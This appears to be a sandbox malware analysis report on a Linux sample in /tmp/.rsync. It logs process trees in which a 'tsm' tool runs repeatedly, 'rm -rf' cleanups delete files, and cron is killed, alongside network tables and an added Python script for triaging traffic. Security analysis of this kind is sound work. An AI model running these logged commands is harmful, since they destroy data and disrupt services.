/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
Network
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Processes
/tmp/.rsync/c/golan
[/tmp/.rsync/c/golan]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| US | 1.1.1.1:53 | ocp-ingress.fastly.gnome.org | udp |
| US | 151.101.1.91:443 | ocp-ingress.fastly.gnome.org | tcp |
| GB | 89.187.167.5:443 | | tcp |
Note: this run recorded 0s of kernel time and no signatures. 224.0.0.251:5353 is the mDNS multicast address and the 151.101.1.91 connections resolve to ocp-ingress.fastly.gnome.org in the same table, so these rows are consistent with the Ubuntu guest's own background traffic rather than connections made by the sample; verify the owners of 185.125.188.62 and 89.187.167.5 before attributing either to it.
Files
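A sandbox network table like the one in behavioral19 mixes guest OS background traffic with anything the sample does, and the analyst's first job is to separate the two before hunting for C2. The triage below is an added example, not code from the report: it takes the rows as printed above (constructed here as tuples), reuses a domain seen for an IP in one row to explain bare rows for the same IP, and labels multicast, platform-domain and allowlisted-range destinations as noise. The `PLATFORM_NETS` entry for 185.125.188.0/22 and the domain suffix list are analyst-maintained assumptions for a stock Ubuntu image and must be verified against whois/RDAP; they are not data from the report.

```python
"""Separate sandbox background traffic from sample-attributable connections.

Added example, not part of the report. ROWS is constructed from the
behavioral19 Network table above; PLATFORM_NETS and PLATFORM_DOMAIN_SUFFIXES
are assumptions for a stock Ubuntu guest that must be verified per image.
"""
import ipaddress

# (destination, resolved domain or "") exactly as the table prints them.
ROWS = [
    ("224.0.0.251:5353", ""),
    ("185.125.188.62:443", ""),
    ("185.125.188.62:443", ""),
    ("151.101.1.91:443", ""),
    ("1.1.1.1:53", "ocp-ingress.fastly.gnome.org"),
    ("151.101.1.91:443", "ocp-ingress.fastly.gnome.org"),
    ("89.187.167.5:443", ""),
]

# Assumed platform noise for the Ubuntu guest (verify with whois/RDAP).
PLATFORM_NETS = {
    ipaddress.ip_network("185.125.188.0/22"): "Canonical (Ubuntu update/snap services, assumed)",
}
PLATFORM_DOMAIN_SUFFIXES = (".gnome.org", ".ubuntu.com", ".canonical.com")


def classify(dest, domain):
    """Return (label, reason) for one row; label is 'noise' or 'unattributed'."""
    host, _, port = dest.rpartition(":")
    ip = ipaddress.ip_address(host)
    if ip.is_multicast:
        return "noise", "multicast" + (" (mDNS)" if port == "5353" else "")
    if domain and domain.endswith(PLATFORM_DOMAIN_SUFFIXES):
        what = "DNS lookup for" if port == "53" else "connection to"
        return "noise", f"{what} platform domain {domain}"
    for net, owner in PLATFORM_NETS.items():
        if ip in net:
            return "noise", f"in {net} ({owner})"
    return "unattributed", "no platform domain or allowlisted range; check the pcap before calling it C2"


def triage(rows):
    """Classify every row as (dest, label, reason).

    A domain the sandbox resolved for an IP anywhere in the capture is applied
    to bare rows for that IP, so the first 151.101.1.91 row is not left orphaned.
    """
    known = {d.rpartition(":")[0]: dom for d, dom in rows if dom}
    out = []
    for dest, domain in rows:
        dom = domain or known.get(dest.rpartition(":")[0], "")
        label, reason = classify(dest, dom)
        out.append((dest, label, reason))
    return out


if __name__ == "__main__":
    for dest, label, reason in triage(ROWS):
        print(f"{label:12} {dest:22} {reason}")
```

On the rows above everything but 89.187.167.5:443 is explained as guest noise; that one row stays unattributed, which does not make it C2 (the run showed 0s kernel time), only the single destination worth opening the pcap for.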
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsbe-20240418-en
Max time kernel
2s
Command Line
Signatures
Enumerates running processes
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/18/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/695/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/13/stat | /bin/ps | N/A |
| File opened for reading | /proc/22/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/37/status | /bin/ps | N/A |
| File opened for reading | /proc/69/stat | /bin/ps | N/A |
| File opened for reading | /proc/240/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/362/stat | /bin/ps | N/A |
| File opened for reading | /proc/12/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/159/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/14/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/70/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/404/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/20/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/159/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/240/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/668/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/694/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/362/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/74/stat | /bin/ps | N/A |
| File opened for reading | /proc/700/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/159/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/68/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/ps | N/A |
| File opened for reading | /proc/722/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/733/status | /bin/ps | N/A |
| File opened for reading | /proc/3/stat | /bin/ps | N/A |
| File opened for reading | /proc/21/status | /bin/ps | N/A |
| File opened for reading | /proc/20/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/240/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/668/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/721/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/724/status | /bin/ps | N/A |
| File opened for reading | /proc/15/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/19/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/20/stat | /bin/ps | N/A |
| File opened for reading | /proc/69/status | /bin/ps | N/A |
| File opened for reading | /proc/718/status | /bin/ps | N/A |
| File opened for reading | /proc/1/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/21/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/681/status | /bin/ps | N/A |
| File opened for reading | /proc/726/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/166/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/336/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/336/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/17/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/695/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/12/stat | /bin/ps | N/A |
| File opened for reading | /proc/17/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/19/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/694/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/722/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/20/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/733/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/9/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/37/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/394/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/668/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/180/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/8/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/718/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/74/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/735/cmdline | /bin/ps | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/.proc | /tmp/.rsync/a/stop | N/A |
Processes
/tmp/.rsync/a/stop
[/tmp/.rsync/a/stop]
/usr/bin/pkill
[pkill -9 cron]
/usr/bin/killall
[killall -9 cron]
/bin/ps
[ps x]
/bin/grep
[grep -v grep]
/bin/grep
[grep cron]
/usr/bin/awk
[awk {print $1}]
/bin/rm
[rm -rf .proc]
Network
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:58
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
147s
Max time network
129s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
Processes
/tmp/.rsync/c/go
[/tmp/.rsync/c/go]
/bin/uname
[uname -m]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | N/A | udp |
| GB | 185.125.188.61:443 | N/A | tcp |
| GB | 185.125.188.61:443 | N/A | tcp |
| US | 151.101.1.91:443 | N/A | tcp |
| US | 151.101.1.91:443 | N/A | tcp |
| GB | 195.181.164.19:443 | N/A | tcp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:58
Platform
debian9-armhf-20240418-en
Max time kernel
148s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
Processes
/tmp/.rsync/c/go
[/tmp/.rsync/c/go]
/bin/uname
[uname -m]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
